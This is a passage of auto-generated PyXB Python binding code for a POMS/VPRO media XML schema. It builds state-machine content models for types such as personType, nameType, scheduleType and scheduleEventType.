fac.UpdateInstruction(cc_13, False) ]))
st_15._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_14, True) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_14, False) ]))
st_16._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_15, True) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_15, False) ]))
st_17._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_16, True) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_16, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_16, False) ]))
st_18._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_17, True) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_17, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_17, False) ]))
st_19._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_18, True) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_18, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_18, False) ]))
st_20._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_19, True) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_19, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_19, False) ]))
st_21._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_20, True) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_20, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_20, False) ]))
st_22._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_21, True) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_21, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_21, False) ]))
st_23._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_22, True) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_22, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_22, False) ]))
st_24._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_23, True) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_23, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_23, False) ]))
st_25._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_24, True) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_24, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_24, False) ]))
st_26._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_25, True) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_25, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_25, False) ]))
st_27._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_26, True) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_26, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_26, False) ]))
st_28._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_27, True) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_27, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_27, False) ]))
st_29._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_28, True) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_28, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_28, False) ]))
st_30._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_29, True) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_29, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_29, False) ]))
st_31._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_30, True) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_30, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_30, False) ]))
st_32._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_31, True) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_31, False) ]))
st_33._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_32, True) ]))
st_34._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
baseMediaType._Automaton = _BuildAutomaton_13()
personType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'givenName'), pyxb.binding.datatypes.string, scope=personType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 553, 6)))
personType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'familyName'), pyxb.binding.datatypes.string, scope=personType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 554, 6)))
def _BuildAutomaton_14 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_14
del _BuildAutomaton_14
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(personType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'givenName')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 553, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
symbol = pyxb.binding.content.ElementUse(personType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'familyName')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 554, 6))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
personType._Automaton = _BuildAutomaton_14()
nameType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'name'), pyxb.binding.datatypes.string, scope=nameType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 563, 6)))
nameType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'scopeNote'), pyxb.binding.datatypes.string, scope=nameType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 564, 6)))
def _BuildAutomaton_15 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_15
del _BuildAutomaton_15
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 563, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 564, 6))
counters.add(cc_1)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(nameType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'name')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 563, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(nameType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'scopeNote')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 564, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
nameType._Automaton = _BuildAutomaton_15()
scheduleType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'scheduleEvent'), scheduleEventType, scope=scheduleType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 713, 6)))
def _BuildAutomaton_16 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_16
del _BuildAutomaton_16
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(scheduleType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'scheduleEvent')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 713, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
scheduleType._Automaton = _BuildAutomaton_16()
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'title'), scheduleEventTitle, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 732, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'description'), scheduleEventDescription, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 733, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'repeat'), repeatType, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 734, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'memberOf'), pyxb.binding.datatypes.anyURI, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 735, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'avAttributes'), avAttributesType, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 736, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'textSubtitles'), pyxb.binding.datatypes.string, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 737, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'textPage'), pyxb.binding.datatypes.string, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 738, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'guideDay'), pyxb.binding.datatypes.date, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 739, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'start'), pyxb.binding.datatypes.dateTime, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 740, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'offset'), pyxb.binding.datatypes.duration, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 741, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'duration'), pyxb.binding.datatypes.duration, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 742, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'poProgID'), pyxb.binding.datatypes.string, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 743, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'primaryLifestyle'), pyxb.binding.datatypes.string, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 744, 6)))
scheduleEventType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'secondaryLifestyle'), pyxb.binding.datatypes.string, scope=scheduleEventType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 745, 6)))
def _BuildAutomaton_17 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_17
del _BuildAutomaton_17
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 732, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 733, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 734, 6))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 735, 6))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 736, 6))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 737, 6))
counters.add(cc_5)
cc_6 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 738, 6))
counters.add(cc_6)
cc_7 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 741, 6))
counters.add(cc_7)
cc_8 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 743, 6))
counters.add(cc_8)
cc_9 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 744, 6))
counters.add(cc_9)
cc_10 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 745, 6))
counters.add(cc_10)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'title')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 732, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'description')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 733, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'repeat')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 734, 6))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'memberOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 735, 6))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = None
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'avAttributes')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 736, 6))
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = None
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'textSubtitles')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 737, 6))
st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = None
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'textPage')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 738, 6))
st_6 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
final_update = None
